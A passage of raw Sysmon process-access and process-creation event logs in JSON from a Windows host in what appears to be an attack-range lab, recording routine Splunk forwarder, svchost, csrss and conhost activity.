C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-0010C88D0300}","TargetProcessId":"4052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1768,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 2388\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-001063890300}\r\nTargetProcessId: 4004\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x101541\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2dbe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+155e9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+fa1f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1351d|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+127f4|C:\\Windows\\system32\\wbem\\wbemcore.dll+ced2|C:\\Windows\\system32\\wbem\\wbemcore.dll+d531|C:\\Windows\\system32\\wbem\\wbemcore.dll+104fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+25435|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+dc51|C:\\Windows\\system32\\wbem\\wbemcore.dll+2cfdf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"2388","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-001063890300}","TargetProcessId":"4004","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x101541","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+20fee|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+2dbe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+155e9|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1498a|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+146e6|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+140fe|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+fa1f|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+1351d|C:\\Windows\\system32\\wbem\\wmiprvsd.dll+127f4|C:\\Windows\\system32\\wbem\\wbemcore.dll+ced2|C:\\Windows\\system32\\wbem\\wbemcore.dll+d531|C:\\Windows\\system32\\wbem\\wbemcore.dll+104fe|C:\\Windows\\system32\\wbem\\wbemcore.dll+25435|C:\\Windows\\system32\\wbem\\wbemcore.dll+24a9a|C:\\Windows\\system32\\wbem\\wbemcore.dll+2485e|C:\\Windows\\system32\\wbem\\wbemcore.dll+dc51|C:\\Windows\\system32\\wbem\\wbemcore.dll+2cfdf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22adf|C:\\Windows\\system32\\wbem\\wbemcore.dll+22a19|C:\\Windows\\system32\\wbem\\wbemcore.dll+21f5a|C:\\Windows\\system32\\wbem\\wbemcore.dll+22711|C:\\Windows\\system32\\wbem\\wbemcore.dll+2d78c","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1769,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.124\r\nProcessGuid: {A837DB8D-01C7-5F25-0000-00108A8F0300}\r\nProcessId: 4076\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01C7-5F25-0000-0010C88D0300}\r\nParentProcessId: 4052\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.124","ProcessGuid":"{A837DB8D-01C7-5F25-0000-00108A8F0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01C7-5F25-0000-0010C88D0300}","ParentProcessId":"4052","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1770,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01C7-5F25-0000-0010C88D0300}\r\nSourceProcessId: 4052\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-00108A8F0300}\r\nTargetProcessId: 4076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01C7-5F25-0000-0010C88D0300}","SourceProcessId":"4052","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-00108A8F0300}","TargetProcessId":"4076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1771,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C7-5F25-0000-00108A8F0300}\r\nTargetProcessId: 4076\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C7-5F25-0000-00108A8F0300}","TargetProcessId":"4076","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1772,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1773,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1774,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:47","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1775,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:47.110\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:47.110","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
